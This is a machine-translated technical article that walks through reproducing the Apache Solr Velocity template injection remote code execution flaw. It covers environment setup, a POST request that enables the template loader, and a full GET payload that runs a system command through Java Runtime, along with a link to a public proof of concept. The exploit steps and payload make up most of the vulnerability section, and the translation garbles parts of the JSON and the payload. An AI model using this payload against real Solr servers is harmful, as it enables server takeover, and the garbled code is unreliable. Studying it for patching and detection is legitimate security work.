Shulou(Shulou.com)05/31 Report--

This article mainly analyzes the relevant knowledge points of the example analysis of Apache Solr velocity template injection RCE vulnerabilities, the content is detailed and easy to understand, the operation details are reasonable, and has a certain reference value. If you are interested, you might as well follow the editor to take a look, and follow the editor to learn more about "sample analysis of RCE vulnerabilities injected into Apache Solr velocity templates".

Introduction to 0x01

Solr is an independent enterprise search application server that provides an API interface similar to Web-service. Users can submit a certain format of XML file to the search engine server through http request to generate an index, or they can make a search request through Http Get operation and get the return result in XML format.

Introduction of 0x02 vulnerabilities

There is a VelocityResponseWriter component in Solr, and an attacker can construct a specific request to modify the relevant configuration, so that the VelocityResponseWriter component allows the specified template to be loaded, which leads to a remote command execution vulnerability injected into the Velocity template, which can be exploited by the attacker to gain server privileges directly.

0x03 scope of influence

Apache Solr 5.x-8.2.0, config API version exists

0x04 environment building

Install the java8 environment, and then download Solr at:

Https://www.apache.org/dyn/closer.lua/lucene/solr/8.2.0/solr-8.2.0.zip

After the download is completed, decompress it and then go to the bin directory to execute. / solr start

Unzip solr-8.2.0.zip

Some warning messages will appear when starting up, which can be eliminated by modifying the solr.in.sh file under bin and setting SOLR_ULIMIT_CHECKS to false

Vim solr.in.sh

Then start the solr start root again. / if startup fails, add-force to the end.

The following interface appears when the browser accesses http://ip:8983, indicating that the installation is successful.

But found that core could not be created

Let's manually create a new_core folder under the / server/solr/ directory, then copy the conf directory under / server/solr/configsets/_default/ to the new_core directory, and then click create

Recurrence of 0x05 vulnerabilities

After the Core is created, access to check whether the application config file can be accessed.

Http://ip:8983/solr/new_core/config

Apache Solr integrates the VelocityResponseWriter plug-in by default, and the params.resource.loader.enabled default value in the plug-in initialization parameters is set to false, but you can modify the integration setting directly through POST requests to set it to true, and then you can construct special GET requests for remote code execution.

Use Burp to grab the package of this page, construct the POST request directly, and add the following data

{

"update-queryresponsewriter": {

"startup": "lazy"

"name": "velocity"

"class": "solr.VelocityResponseWriter"

"template.base.dir":

"solr.resource.loader.enabled": "true"

"params.resource.loader.enabled": "true"

}

}

Then we can construct payload to implement RCE

Payload:

Http://ip:8983/solr/test/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27id%27))+$ex.waitFor() +% 23set ($out=$ex.getInputStream ()) +% 23foreach ($str.valueOf + [1..$out.available ()]) $str.valueOf ($chr.toChars ($out.read ()% 23end

POC address: https://github.com/wyzxxz/Apache_Solr_RCE_via_Velocity_template

0x06 repair mode

Update to the latest version

This is the end of the "sample Analysis of RCE vulnerabilities injected into Apache Solr velocity templates". More related content can be searched for previous articles, hoping to help you answer questions and questions, please support the website!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.